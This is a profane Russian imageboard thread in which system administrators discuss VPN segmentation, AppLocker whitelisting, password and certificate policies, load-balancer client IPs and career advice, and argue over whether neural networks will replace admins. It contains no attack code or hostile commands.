Вариант с отдельным впном и дмз для каждого сервиса уебищен, т.к. если внутренних ресурсов много, то у разъездных сотрудников будет несколько десятков ярлычков разных впнов с... РАЗНЫМИ паролями и точками входя, иначе это всё, очевидно, теряет всякий смысл. Хуже того, если есть локалка, откуда у пользователей есть доступ ко всем сервисам сразу, то стоит кому-то схватить бекдор или поставить тимвьювер, как все титанические усилия по защите внешнего периметра идут коту под хвост.

В подобных случаях делают несколько зон с разной степенью секретности, при том доступ к ним ограничивают и из локальной сети тоже. Ну или если деньги позволяют, то покупают нормальное решение уровня того же anyconnect (впрочем, это уже давно не самое лучшее решение), где можно делать группы пользователей и вешать на них профили с разными сплит туннелями, т.е. сегментировать доступ к сети. Дальше остается только каждый сервис в свою подсеть загнать, запретить им видеть друг друга на прямую и разобраться каким группам пользаков что можно, а что нельзя.

В таком варианте у пользователя всегда работает эниконнект и в локалке, и во внешних сетях, просто используются немного разные профили, а логин и пароль всегда один и тот же. Впрочем, и выбор профилей, и ввод логина/пароля могут быть автоматизированы и пользователь даже не будет толком знать как функционирует сеть на его рабочем ноуте, при этом у него могут быть локальные админские права, что превращает ноут из корпоративной гантели таки в компьютер.

97 Кб, 1280x720

10 янв, 11:16 502 1161086

>>61074

>из дмз доступ же не получить к внутренней сети

Ответы61089 61090 61103 67811

10 янв, 11:22 503 1161089

>>61086
Дурик, впн не до сотрудника а для рутера, а с рутера маршрут куда надо дальше
Например, если у тебя серверная часть разбита на две, лайк ексчейндж, то хороший вариант такой:
почтовый сервер < VPN > | <VPN> сервер для подключения, OWA и тп | реверсивный прокси

Ответы61092

10 янв, 11:23 504 1161090

>>61086
https://habrahabr.ru/post/302068/
Тут хорошо описано

10 янв, 11:24 505 1161091

Коллеги, возникла необходимость через AppLocker создать на терминальном сервере белый список приложений доступных для использования, но есть желание использовать его не так, что пользователю доступны для запуска все приложения из папки Windows и PrFiles, а только обозначенный список.
Кто знает где можно посмотреть список приложений из этих папок необходимых для работы сессии юзверя (понимаю что он наверное будет достаточно большой, но на волне вскрытия покровов всяких этих новых уязвимостей начальство начало параноить)? Гуглить пытался и так и эдак, ни в какую, готовых пресетов для AppLocker'a тоже не нашел с таким уклоном.

Ответы61094 61119

10 янв, 11:32 506 1161092

>>61089
Речь изначально шла о доступе произвольных сотрудников к произвольным внутренним ресурсам из внешних сетей. Пример с эксченджом нерелевантный, т.к. во-первых, не всякая его версия делится на фронт- бек-энд, во-вторых, там где такое деление заложено архитектурно и проблем никаких не возникает, в третьих, почтовый сервер всё равно всегда доступен из вне, т.е. сотрудникам не нужно ничего дополнительно предпринимать, чтобы им пользоваться откуда угодно.

Ответы61096

10 янв, 11:34 507 1161094

>>61091
Могу предложить только через ГПО
http://vynesimozg.com/razreshit-zapusk-tolko-opredelennyx-programm-v-windows/

Хотя решение так себе

Ответы61095

10 янв, 11:37 508 1161095

>>61094
Через ГПО рассматривал как вариант, но нигде не нашел принцип работы, если у апплокера четко написано что проверяет по хэшу, то ГПО не описано по хэшу или это просто хуета, у которой можно будет в изи подменить сам исполняемый файл.

Ответы61097

10 янв, 11:39 509 1161096

>>61092

>шла о доступе произвольных сотрудников к произвольным внутренним ресурсам из внешних сетей

Ну, я думал, что мы уже согласились на ВПН, так как остальные варианты не являются безопасными
Ексчейндж - разговор про правильный ДМЗ, а не просто создал отдельную подсеть и туда напихал

10 янв, 11:40 510 1161097

>>61095

>подменить сам исполняемый файл.

Да, так и есть, но ты можешь использовать оба решения разом:
1. Аплокер не даст доступ никуда кроме програмфайлс, а туда может писать файлы только администратор
2. А ГПО залочить файлы по именам, опять же переименовать файл в програмфайлс, насколько я помню, простой юзер не может
или как-то так

Ответы61098 61119

10 янв, 11:42 511 1161098

>>61097
Спасибо за ответы, потестирую такую связку.

10 янв, 11:55 512 1161103

>>61086

>найдут пользователя с плохим паролем

Паролем от впн? Так там сертификаты, которые поверх ещё с паролем. Их по моему не просто перебрать.

Ответы61109 61118

10 янв, 11:58 513 1161109

>>61103
У многих доступ тупо по доменному логину и паролю. Сертификаты нихуя не работают, если компания не может осилить выдачу корпоративных ноутов всем сотрудникам, работающим удаленном, но не способным самостоятельно поставить сертификат на свой домашний комп, а такие - все пользователи, лол.

Ответы61114 61118

10 янв, 12:06 514 1161114

>>61109
Я сейчас говорю не об виндовых решениях, а например о openvpn.

Как делаю я - у меня опенвпн, на котором сделана подсеть для клиентов своя, и стоит запрет ходить куда-то ещё. Когда человеку нужен доступ до внутреннего ресурса, я добавляю правило в фаерволе на именно этот ресурс именно на этого человека, и добавляю ему маршрут в локалку. Сертификаты выпускаю на отдельной машине, когда нужно оформить доступ удалённому пользователю - засовываю сертификат в 7з архив с шифрованием АЕС и километровым паролем, посылаю почтой архив, по телефону отдельно голосом говорю пароль. Какие в таком подходе проблемы?

Ответы61115

10 янв, 12:11 515 1161115

>>61114

>Какие в таком подходе проблемы?

Ну представь, у меня в компании 3000+ пользователей, из них у трети есть внп доступ. Еще у нас десятки внутренних серверов на которые пользователи хотят ходить. Часть этих внутренних ресурсов - фермы с брокером, т.к. ты обращаешься всегда к брокеру, а он пробрасывает тебя на члена фермы, члены фермы каждый имеет свой адрес и могут появляться и исчезать с течением времени. 99% пользователей не способно не то, что сертификат установить или опенвпн клиент себе поставить, а даже архив распаковать не смогут (особенно 7z - это не самый популярный формат среди офисных хомячков).

Теперь прикинь, СКОЛЬКО, у тебя будет работы при твоем то подходе...

Ответы61117 61197

10 янв, 12:17 516 1161117

>>61115
А, ну да, масштабы. У меня не больше сотни клиентов по впн, а сотрудников около тысячи. Единственное что я не автоматизировал в этом алгоритме - передача архива с паролем, остальное скриптами делаю.

Так-то да, согласен, при больших масштабах работы много. Но в остальном по моему ок.

Ответы61118

10 янв, 12:27 517 1161118

>>61103
>>61109
Про сертификат анон прав, даже в моём 6к сотрудников продакшене ВПН на циске по паролю от АД

Есть вариант - сложные пароли, и ещё один, который у себя пока не внедрял, но друг делал:
https://habrahabr.ru/post/310604/
На основании подобного костыля он пинал юзеров на смену "сложных" паролей соответствующих политике на действительно сложные пароли

>>61117

> при больших масштабах работы много

Так лучший показатель качества - масштабируемость

Ответы61134

10 янв, 12:27 518 1161119

>>61097

>1. Аплокер не даст доступ никуда кроме програмфайлс, а туда может писать файлы только администратор

Схуев? Можешь настраивать правила для путей как хочешь, всё зависит от тебя.

>>61097

>2. А ГПО залочить файлы по именам, опять же переименовать файл в програмфайлс, насколько я помню, простой юзер не может

>или как-то так

>>61091

>Коллеги, возникла необходимость через AppLocker создать на терминальном сервере белый список приложений доступных для использования, но есть желание использовать его не так, что пользователю доступны для запуска все приложения из папки Windows и PrFiles, а только обозначенный список.

>Кто знает где можно посмотреть список приложений из этих папок необходимых для работы сессии юзверя (понимаю что он наверное будет достаточно большой, но на волне вскрытия покровов всяких этих новых уязвимостей начальство начало параноить)? Гуглить пытался и так и эдак, ни в какую, готовых пресетов для AppLocker'a тоже не нашел с таким уклоном.

Через ГПО распространяешь политику Апплокера. В самом апплокере настраиваешь как душе угодно. Хоть по хэшу, хоть по сертификатам, хоть по путям.

10 янв, 13:08 519 1161134

>>61118

>ВПН на циске по паролю от АД

Единственный вариант перейти к сертификатам - выдавать сотрудникам преднастроенные ноуты. Приличные компании, беспокоящиеся о безопасности так и делают. Тем более, что выдавать ноуты выгоднее, чем оборудовать рабочие места компами. Но тут зрелость бизнеса нужна, т.к. многие боятся, что ноуты разворуют, что на них будут не работать, а развлекаться, что их сломают, постоянно таская домой, что не будут появляться в офисе, оправдываясь "из дома поработаю", что так дороже выйдет. И развеять все эти заблуждения невозможно - бизнес сам должен понять, что стационарные компьютеры давно устарели и по сути своей уже давно никому не нужны, кроме геймеров да дизайнеров.

>сложные пароли

Этот вариант вообще не работает. Особенно сильно он не работает в сочетании с необходимости регулярной смены пароля. Умные люди, кстати, давно уже пришли к выводу, что сложный пароль помнить нужно всего один, а менять его только при подозрении, что он был скомпрометирован, отслеживанием чего и должна заниматься служба безопасности. Подробнее тут: https://habrahabr.ru/company/everydaytools/blog/334600/

Ответы61137 61142

10 янв, 13:14 520 1161137

>>61134

>Этот вариант вообще не работает

Опомнись, у тебя по PCI DSS или ISO 27000 должна быть постоянная смена паролей пользователей

По поводу устройств - тут часть фирмы, но есть и личные, когда сотрудник (директор филиала) сам начинает требовать, чтобы он работал на личном маке

В любом случае авторизации по сертификату нету

Ответы61139

10 янв, 13:21 521 1161139

>>61137

>PCI DSS или ISO 27000

Ну тогда смирись, что у всех пользователей всегда будут пароли вида:
pA$Cf0Rd1_
pA$Cf0Rd_2
pA$Cf0Rd3_
pA$Cf0Rd4_
pA$Cf0Rd_5
Которые, кстати, хорошо брутаются, подробнее тут: https://habrahabr.ru/company/everydaytools/blog/323864/

Ответы61145

10 янв, 13:22 522 1161142

>>61134

>Единственный вариант перейти к сертификатам - выдавать сотрудникам преднастроенные ноуты. Приличные компании, беспокоящиеся о безопасности так и делают. Тем более, что выдавать ноуты выгоднее, чем оборудовать рабочие места компами. Но тут зрелость бизнеса нужна, т.к. многие боятся, что ноуты разворуют, что на них будут не работать, а развлекаться, что их сломают, постоянно таская домой, что не будут появляться в офисе, оправдываясь "из дома поработаю", что так дороже выйдет. И развеять все эти заблуждения невозможно - бизнес сам должен понять, что стационарные компьютеры давно устарели и по сути своей уже давно никому не нужны, кроме геймеров да дизайнеров.

Если фирма большая, то можно заморочиться и поднять портал на котором пользователи будут сами себе генерировать сертификаты.

Ответы61143 61146

10 янв, 13:23 523 1161143

>>61142
Лишний геморрой, который мало кто осилит.

Ответы61149

10 янв, 13:26 524 1161145

>>61139
Что ты сейчас вообще несёшь, суть в том, что бы убрать топ 1000 хешей паролей

Почитай как подбирают пароли, это делается по радужной карте, так всё сводится к тому, чтобы твои хеши туда не попадали.

В любом случае с выходом на стандарт ИБ тебе всё равно придётся это внедрять

Ответы61151

10 янв, 13:28 525 1161146

>>61142

> то можно заморочиться и поднять портал на котором пользователи будут сами себе генерировать сертификаты

Это так не работает
1 - это не секурно
2 - юзеры это не будут делать, это не их проблема и задача
3 - головная боль для эникеев

Ответы61149

10 янв, 13:30 526 1161149

>>61143

>Лишний геморрой, который мало кто осилит.

У нас так для почты сделано. На мобильные устройства, либо на ноутбуки пользователи генерируют себе серт и ходят в ОВУ как молодцы.

>>61146

>Это так не работает

>1 - это не секурно

>2 - юзеры это не будут делать, это не их проблема и задача

>3 - головная боль для эникеев

1) Смотря для чего использовать и как реализовать
2) Если энтерпрайз, то будут, им деваться некуда
3) Такова жизнь эникея.

Ответы61151

10 янв, 13:33 527 1161151

>>61145
После пары смены паролей - всё вернется на круги своя. Ну или тебе нужно постоянно брутить радужными пароли собственных пользователей и после постоянно пиздить пользаков за нарушения. Упрешься ты в то, что какой-нибудь топ-менеджер в итоге пошлет пошлет тебя нахуй... ну или бабки из бухгалтерии устроят бунт, в котором топы обвинят, конечно, тебя. Всех, кто пытается плыть против течения - смоет. Рано или поздно.

>>61149

>им деваться некуда

Ага, до первой проблемы у какой-нибудь важной шишки, после чего все подобные штуки навсегда закрываются, либо часть избранных сотрудников, начинает работать в обход них. Не нужно усложнять. Максимум что можно сделать - двухфакторную авторизацию по смс для сотрудников, входящих в сеть удаленно. И то это херовая идея, если, например, я уехал в Тай на месяц и оставил российскую симку дома за ненадобностью, а потом оказалось, что без меня бизнес нихуя не может, т.к. мой коллега заболел/умер.

Ответы61153 61156

10 янв, 13:34 528 1161153

>>61151

>Ага, до первой проблемы у какой-нибудь важной шишки, после чего все подобные штуки навсегда закрываются, либо часть избранных сотрудников, начинает работать в обход них. Не нужно усложнять. Максимум что можно сделать - двухфакторную авторизацию по смс для сотрудников, входящих в сеть удаленно. И то это херовая идея, если, например, я уехал в Тай на месяц и оставил российскую симку дома за ненадобностью, а потом оказалось, что без меня бизнес нихуя не может, т.к. мой коллега заболел/умер.

Я же написал, энтерпрайз. У нас всё как часы и с большими шишками тоже.

Ответы61184

10 янв, 13:42 529 1161156

>>61151

>После пары смены паролей

Ты вообще не читаешь, что тебе пишут, подобный костыль был внедрён после проведения аудита PCI DSS, когда у пользователя оказался пароль Andrey1, он отвечал всем требованием сложных паролей, но стандартизацию мой друг не мог пройти до устранения подобных паролей, от чего и был придуман костыль по удалению самых популярных паролей
Иди фантазируй дальше. Даже в моей конторе с 6к пользователями без стандартизации есть сложные пароли с сроком 42 дня, все сидят с такими паролями и не пукают

Ответы61184

10 янв, 14:26 530 1161184

>>61156
Ты реально на 100% уверен, что у вас не осталось херовых паролей? То, что ты прошел аудит и получил сертификат вчера, вовсе не значит, что пройдешь его сегодня! Потому что у вас пароли сложные и регулярно меняются, а изменить поведение и привычки людей невозможно...

>>61153
Не верю. Скорее всего, ты просто не знаешь о той хуйне что где-нибудь сбоку от тебя творится. А хуйня, она, точно есть.

Ответы61190 61195

10 янв, 14:36 531 1161190

>>61184

>Не верю. Скорее всего, ты просто не знаешь о той хуйне что где-нибудь сбоку от тебя творится. А хуйня, она, точно есть.

Конечно хуйня творится на уровне эникеев. Но их жизнь создана для боли. Но больший процент сотрудников научился подключать почту сам.

Про ВПН отдельная боль, т.к он у нас программно-аппаратный.

Ответы61196

10 янв, 14:52 532 1161195

>>61184
Расслабься уже, аудит проводится раз в какое-то время, если нужно подтверждения стандартам ИБ, и не у меня, а у друга
Ну не хочешь ты сложных паролей, так не делай, кто тебе запрещает

10 янв, 14:52 533 1161196

>>61190

>Про ВПН отдельная боль, т.к он у нас программно-аппаратный.

циска с с-террой что ли? или что у тебя там не так?

Ответы61219

10 янв, 14:53 534 1161197

>>61115

>особенно 7z - это не самый популярный формат среди офисных хомячков

Для меня загадка как эти люди получают работу и что они пишут в резюме. Резюме бухгалтера еще могу себе представить, но что пишут какие-нибудь эффективные менеджеры по работе с клиентами или продаваны? "Сидел и продавал"? "Эффективно общался с клиентами"? "Ворд, Эксель, 1С, интернет"?

Ответы61205 61228

10 янв, 15:08 535 1161205

>>61197
Они и не пишут, устраиваются по знакомству все как один. Резюме и собеседования для ребят попроще.

10 янв, 15:31 536 1161219

>>61196

>циска с с-террой что ли? или что у тебя там не так?

Циска с с-террой разве получили сертификат соответствия в нашей стране и в разрешенном списке у регулятора? Нет, увы.

Ответы61233

10 янв, 15:46 537 1161223

Коллеги, слушайте, столкнулся с проблемой балансировки нагрузки. Тестирование показало, что балансировщик подставляет свой ip-адрес в запрос к серверу и обратно, вместо реального адреса клиента. При этом пропадает возможность определения клиента от которого исходит запрос. Возможно как-то обеспечить обратную маршрутизацию, т.к когда адрес клиента будет пробрасываться сквозь балансировщик?

Ответы61229 61247 63412

10 янв, 15:51 538 1161228

>>61197

>эффективные менеджеры по работе с клиентами или продаваны

Что-то типа:
- Увеличение продаж на вверенном регионе на 25 процентов за квартал.
- Работа с возражениями потенциальных клиентов, увеличение базы данных клиентов на 10 процентов за месяц.
- Призер по продажам конкурса "Лучший продавец ООО Рога копыта"

что тут непонятного?

10 янв, 15:52 539 1161229

>>61223
У nginx можно вместе с адресом балансировщика записывать реальный ip. Можно напердолить сканирование логов nginx и дальше использовать адрес клиента где надо.

Вроде Nginx Application Platform позволяет сразу питоновский код выполнять, я правда вообще рпо это ничего не знаю. Но в теории наверное можно решить эту проблему чисто средствами nginx

Ответы61242

10 янв, 15:54 540 1161231

<anclbob> как заблокировать диапазон 192.168.0.0-192.168.254.254 на freeBSD?
<anclbob> я сделал файл в 65 тыс строк вот таких:
ifconfig_fxp0_alias0="inet 192.168.0.0 netmask 255.255.255.255"
.....
ifconfig_fxp0_alias65434="inet 192.168.254.254 netmask 255.255.255.255"
<anclbob> занёс в rc.conf, но фря загружалась минут 20 и дошла только до 192 подсети.
<anclbob> Как решить такую проблему что бы нежелательные пользователи не могли попасть в сеть никак?

Ответы61234

10 янв, 15:56 541 1161233

>>61219

>в разрешенном списке у регулятора

С-терра - да, конечно, это российская компания, выпускает модули ВПН для цисок, "с целью скрыться от сертификатов злых пендосов в ипсек", а на деле, просто, чтобы смотреть банковский трафик

Ответы61238

10 янв, 15:57 542 1161234

>>61231
Рискну предположить что нужна маска /16

10 янв, 16:10 543 1161238

>>61233

>С-терра - да, конечно, это российская компания, выпускает модули ВПН для цисок, "с целью скрыться от сертификатов злых пендосов в ипсек", а на деле, просто, чтобы смотреть банковский трафик

Понятно, спасибо, не знал. У нас другое зло - Амикон.

10 янв, 16:13 544 1161242

>>61229

>У nginx можно вместе с адресом балансировщика записывать реальный ip. Можно напердолить сканирование логов nginx и дальше использовать адрес клиента где надо.

>

>Вроде Nginx Application Platform позволяет сразу питоновский код выполнять, я правда вообще рпо это ничего не знаю. Но в теории наверное можно решить эту проблему чисто средствами nginx

Поднимать nginx под такое не будут, у нас купленный SCCM, который такое не умеет вроде как. Ну либо надо будет непосредственно в пакеты вносить изменения.

Аппаратные решения тоже подойдут, если есть NLB с такими фичами.

10 янв, 16:18 545 1161247

>>61223
Тоже самое, у нас стоит х-прокси реверсом на почту, на х-прокси видны внешние ИП, а дальше на почту приходят запросы с самого ревирса, но нас это устраивает
У тебя какая цель?

Ответы61258

10 янв, 16:20 546 1161251

Сап сасач. Итт сыч 25 лвл. Хочу работу, связанную с ойти. Много раз пытался в погромирование с 16 до 23 лет, но СДВГ не считает, что мне это нужно, забил уже.

Вообще я уже года два чекаю вакансии курьера на хедхантере, но по моему округу, в <часе пути, нормальных вакансий вообще нихуя нет, и это сраный ДС. Только на развоз еды, но это супер дно, не хотет.

В общем к сути. Я знаю что тут сейчас все дохуя самоучки мне напишут что я долбоеб, но может найдется кто адекватный с нормальным ответом. Насколько котируются курсы сис.админов? Мне нужно чтобы меня всему научили за n часов, выдали бумажку и можно было сразу искать работу, надоело сычевать и жрать мамкины коклеты и пельмени. Может посоветуете контору нормальную, или просто пару советов дадите, заранее благодарю.
Открыл, перед тем как это написать, первый результат в гугле, там типа за 60 академичиских часов за полтора месяца дают основу с практикой, за 12к рупий. Пока что планирую подыскать подобное, но поближе к дому, а не в полутора часах езды в один конец.

Ответы61260 61275 61315 62885

10 янв, 16:32 547 1161258

>>61247

>Тоже самое, у нас стоит х-прокси реверсом на почту, на х-прокси видны внешние ИП, а дальше на почту приходят запросы с самого ревирса, но нас это устраивает

>У тебя какая цель?

Это балансировщик LDAP. Учетная запись сотрудника лочится, но источником выступает балансировщик, из-за чего найти реальный источник невозможно. Тоже самое в DNS. Системы устраивают ДДОС, но конкретных клиентом не видно.

Ответы63412

10 янв, 16:34 548 1161260

>>61251

>Мне нужно чтобы меня всему научили за n часов, выдали бумажку и можно было сразу искать работу, надоело сычевать и жрать мамкины коклеты и пельмени. Может посоветуете контору нормальную, или просто пару советов дадите, заранее благодарю.

Смотри переквалификацию.

10 янв, 16:51 549 1161275

>>61251
Такие "курсы" - развод и лохотрон. Выбери интересующие тебя продукты/железки, найди на торрентах программу обучения составленную вендором и готовься по ней - вся информация есть интернете в почти открытом виде. Потом, если средства позволяют, можешь сдать официальный вендорский экзамен. Получишь ачивку - сертификат. Его можно будет вписать в резюме и работодатель увидит, что ты не полный долбоеб и из лужи не пьешь. Можно будет вкатиться на нормальную работу и начать набивать экспу.

10 янв, 17:41 550 1161315

>>61251
Чего умеешь то, чего хочешь? Сколько денег есть на обучения/сертификации. А то и айти большое и курсы есть по 2к зелени в неделю...

Ответы61328

10 янв, 17:54 551 1161328

>>61315

> Чего умеешь то, чего хочешь?

Ну, некоторые базовые знания есть. Пару лет назад ещё бубунты всякие с минтом ставил на свой ноут. Арч правда так и не смог поставить, мб из-за железа ебанутого.

> Сколько денег есть на обучения/сертификации

Тот первый результат в гугле стоил около 12к за все 60 академ.часов. Хотелось бы не больше тридцатки тащемта.

Ответы61707

10 янв, 17:54 552 1161331

К вопросу о стойких паролях. Неплохой вариант же випнетовский генератор бреда. Он, правда, как-то пропал из публичного доступа, но подобную "глокую куздру" и самому накарябать можно.
А ещё к аналогичному вопросу в прошлых тредах кто-то писал, что пароли генерирует начальник - бывший вояка. Он, значить, ходить и матькается, а анон за ним записывает.
Главное, чтоб запоминалось. Наркоманские фразочки випнета и витиеватый отборный мат - таки запоминаются. Для совсем дебилов либо биометрия, либо увольнение слишком инициативного анона.

Ответы61699 61707

11 янв, 09:25 553 1161699

>>61331

>Главное, чтоб запоминалось. Наркоманские фразочки випнета

Xo4yHaPy4ki!
такой?

Ответы61705

11 янв, 09:42 554 1161705

>>61699
Скорее что-то вроде "расистский моллюск гарцует на гениталиях".

Ответы61706 61708

11 янв, 09:45 555 1161706

>>61705
Так есть ограничение на пароли в той же АД по длине
это на всякие трукрипты я люблю ставить 20+ символов, а на шинду-то как поставить

Ответы61708

11 янв, 09:46 556 1161707

>>61331
Надеюсь, в ближайшие годы уже полностью перейдут на фейсайди и дактилоскопию. Встроить камеру в монитор, или сканер отпечатков пальцев в мышь/клавиатуру - такое уже есть. Вопрос за софтом и за внедрением решений в бизнес-секторе.

>>61328
Вангую, ты не смог поставить загрузчик в арче, т.к. не разобрался, что для EFI нужен GTP диск, а для BIOS -
MBR. Ну и аргументы у команды установки загрузчика, соответственно, будут немного отличаться.

>базовые знания есть

Если ты хочешь по части линуксов развиваться, то без опыта и образования логично задуматься о RHCSA EX-200 и RHCE EX-300 - в зависимости от твоего опыта. По цене сертификат обойдется в 16-18к рублей где-то. На многие начальные позиции после этого тебя будут охотно брать и с учетом уровня ЗП, твои вложения окупятся в первые же недели на работе.

11 янв, 09:48 557 1161708

>>61706

>ограничение на пароли в той же АД по длине

Там от каждого слова берутся первые три (или сколько получится) буквы.
>>61705

>"расистский моллюск гарцует на гениталиях"

И конец этих слов
АЛЬМСИВИ

Ответы61717

386 Кб, 1075x404

11 янв, 10:00 558 1161717

>>61708

>АЛЬМСИВИ

Ты, щенок, забыл на кого молиться? Сейчас я выбью из тебя это данмерское дерьмо

11 янв, 11:09 559 1161734

Скажите, нужно ли обновлять Rommon на Cisco?

Ответы61777 61805

11 янв, 13:29 560 1161777

>>61734

>Скажите, нужно ли обновлять Rommon на Cisco?

это вообще можно сделать?
Я ни разу не обновлял. IOS/NS-OS только.

Ответы61779

11 янв, 13:41 561 1161779

>>61777
По идее эта херня отвечает за совместимость аппаратной и программной части, cisco.com вообще никакой инфы не дает на этот счет.
Собираюсь загнать 6500 в VSS, в инструкциях предлагают обновить ROMMON на SUP плате, но тоже без объяснения, блеать.

11 янв, 14:26 562 1161802

Какого хера некоторые сайты МТС блокирует даже не взирая на то, что у меня стоит Frigate и ДНС гугла?
Как они его блокируют?

Ответы61805 61806 61808

11 янв, 14:30 563 1161805

>>61802
У меня тоже мтс + фаеровол безопасников - пока с таким не сталкивался, дай что-ли пример сайта...

>>61734
Ну я на 1841 у себя дома обновил. Зачем? Хуй знает.

Ответы61807 61808

11 янв, 14:30 564 1161806

>>61802

>Как они его блокируют?

Я могу тебе немного подсказать, но я боюсь, что меня посодят
ссылка только в ознакомительных целях, по твоему вопросу гугли "обход DPI"
pympekep .com/foru m/viewto pic.ph p?t=5126 394
И обход блокировок незаконен, ты должен сидеть на бутылке, как и я

11 янв, 14:31 565 1161807

>>61805

> мтс + фаеровол безопасников - пока с т

да хоть бы linkedin.com
ещё биржа bitfinex.com

Ответы61810

11 янв, 14:32 566 1161808

>>61805

>1841

У меня была такая, я её другу подарил, наверное надо было себе оставить
>>61802
>>61805
А да, и почисть кешДНС и открой в вкладке инкогнито

11 янв, 14:33 567 1161810

>>61807

>bitfinex.com

МТС на работе - всё открывается
linkedin.com - нет

Ответы61811

11 янв, 14:34 568 1161811

>>61810
МГТС у меня дома. Не открывается.

11 янв, 15:45 569 1161843

https://habrahabr.ru/post/335436/

260 Кб, 1280x1024

12 янв, 14:29 570 1162205

У меня тут дилемма. Ставить домен, или ну его в задницу?

Есть локалка на 20 юзеров без домена.
Нужно воздвигнуть 1С SQL сервер. При попытке поставить MS SQL, он требует от меня данные для входа polybase engine. И не принимает ни локальные учётки, ни системные. Говорит, давай домен. Вот я и думаю, может плюнуть, засучить рукава, и таки сделать домен? Поднять ещё одну виртуалку, поставить домен, ввести сервер 1С в домен и после завершения работ с 1С потихоньку переводить в домен все остальные серверы и юзеров. Но это лишняя работа, плюс у многих тут винда версии хоум. Получится много геморроя и сеть надолго станет одной ногой в рабочей группе, а другой в домене.

Ответы62211 62220

12 янв, 14:40 571 1162211

>>62205

>локалка на 20 юзеров

ну хууууууй знает, хотя домен, конечно, добро, но на 20 юзеров, ну крепко хуй знает
С другой стороны ты хочешь использовать PolyBase, который должен откуда-то брать данные, не?

Ответы62229

12 янв, 15:04 572 1162220

>>62205

> Параллельное хранилище данных PolyBase — это технология, которая обращается к данным за пределами базы данных с помощью языка t-sql. В SQL Server 2016 она позволяет выполнять запросы к внешним данным в хранилище BLOB-объектов Azure или Hadoop, а также импортировать данные в такое хранилище и экспортировать их из него.

Ответ очевиден - тебе не нужен PolyBase Engine, не ставь его.

Ответы62229

12 янв, 15:23 573 1162229

>>62211

>С другой стороны ты хочешь использовать PolyBase

Так уплочено же! Лицензионный Microsoft SQL Server 2016 Standard честно куплен. Правда, Runtime, а не Full, но всё равно.
>>62220
Эх. Это как заплатить проститутке за секс с любыми извращениями, а потом взять и обойтись ез копро. То есть, вроде и не хотелось, но жаба душит.

Ответы62256

12 янв, 16:06 574 1162256

>>62229
Если не будешь юзать, то не надо ставить, нахуй ты себя мучаешь, 20 человек без домена себя отлично чувствуют
Хотя, просто можешь сделать - потренироваться

51 Кб, 604x478

13 янв, 16:42 575 1162564

Возьмут ли меня на работу без вышки и без сертификатов?
Знания и опыт имеются.

13 янв, 17:37 576 1162582

Как же меня ебут. Каждый день встреваю в инцидент на проде, ну просто пиздец, чую и месяца не проработаю в этой конторе.

Ответы62620

13 янв, 19:16 577 1162620

>>62582
Инциденты из-за тебя случаются?

Ответы62651

13 янв, 20:24 578 1162651

>>62620
Нет, но пока я не могу их оперативно решать. Туплю.

Ответы62884

14 янв, 13:40 579 1162871

>>56737
Прекратите ебать труп

14 янв, 14:11 580 1162884

>>62651
Шли борзых погонщиков нахуй. Работодатель имеет с тебя в несколько раз больше бабок, чем платит тебе. Главное, не развивай у себя чувство вины.

Ответы64377

14 янв, 14:13 581 1162885

>>61251
Попробуй вкатиться эникеем. Хоть куда-нибудь точно возьмут.

Ответы63145

14 янв, 17:20 582 1162983

>>49761 (OP)
Вы же понимаете что вашу работу может выполнять не сильно развитая нейросетка? И что в топовых компаниях админов уже выкинули на мороз, и вся работа по расширению и поддержке работоспособности выполняется именно так?

В будущие пять лет ваша профессия полностью вымрет, останутся только такие полуразрабы-внедренцы нейросетей.

Ответы62986

14 янв, 17:26 583 1162986

>>62983
да-да, а всех программистов заменит AI, мы в курсе

Ответы62987

14 янв, 17:27 584 1162987

>>62986
До полноценного ИИ ещё очень долго, и он заменит натурально всех. А вот нейросети уже сейчас админов заменяют.

Я бы на вашем месте перекатывался уже сейчас, пока компании крупные не просекли тренд. В теории, из админа может получиться что-то вроде программиста, при должных усилиях.

Ответы62989 63160

14 янв, 17:29 585 1162989

>>62987

>нейросети уже сейчас админов заменяют

Это интересно как? Конечно некоторая автоматизация присутствует, всякие ансиблы и докеры позволяют в одиночку управлять сотнями, если не тысячами машин.
Вот только конфиги и сценарии таки не нейросети пишут

Ответы63004

14 янв, 18:43 586 1163004

>>62989
Не отвечай ему, тролль должен сдохнуть с голоду. И перестать писать одно и то же.

14 янв, 20:04 587 1163036

Привет котаны. Есть два стула - ccna и далее / mcsa и далее.
Сам пока хуй простой но знания некоторые по обоим областям есть.
Чего хочу получить - хочу перекатиться в ДЦ через полгода-год (а тут надо от 60к зп иметь) и с перспективой съёба в гейропу или асашай.
На какой стул садиться?

Ответы63161 63162 63174

15 янв, 04:37 588 1163145

>>62885

> Хоть куда-нибудь точно возьмут.

Это "хоть куда-нибудь" скорее всего означает какую-нибудь говноконтору на другом конце города. Тратить по полтора часа на путь до работы и потом обратно столько же, и всё это за 25к...

Ответы67813

15 янв, 08:24 589 1163160

>>62987

>В теории, из админа может получиться что-то вроде программиста

Ты с ума сошел что ли? КАК из админа может получится программист? Говнокодер разве что какой-нибудь выйдет на скриптовых языках.
Программист это работа, требующиая светлого ума. Те, кто может стать программистами, в админы не идут.

Ответы63174

15 янв, 08:25 590 1163161

>>63036

>с перспективой съёба в гейропу или асашай

Тогда это надо было садится совсем на другой стул.

15 янв, 08:28 591 1163162

>>63036

>Есть два стула - ccna и далее / mcsa и далее.

тут только ты сам можешь для себя определить что тебе ближе. Забаботать зласчастныю сотку в месяц в ДС можно как сетевиком, так и виндоадмином. Насчет асашай это ты перегнул, как я уже выше ответил.
Админ это не та работа, кого там встретят с распростертыми объятиями. Зачем брать тебя, если полно индусов с гражданством и языком? Накой ты - русский Ваня - там нужен? Домен админить что ли? Сами справятся.

15 янв, 08:31 592 1163165

Насчет замены админов нейросетями соглашусь.
Большинство работы рядового админа на данный момент — это рутина с неким техническим уклоном. (Создание учеток в AD, прописывание вланом на интерфейсах, пердолинг iptables и тому подобная херня.) Уже сейчас, полагаю, можео все это автоматизировать. И 80 процентов работы админа вообзще отпадет. Останется те 20% которые отведены на внедрение различных решений. А этим уже займутся интеграторы. А ты, админ, бери в руки метлу и начинай привыкать к конкурентной берьбе с нашими братьями из Средней Азии.

Ответы63174 63373 63384

15 янв, 08:49 593 1163174

>>63160

>Программист это работа, требующиая светлого ума. Те, кто может стать программистами, в админы не идут.

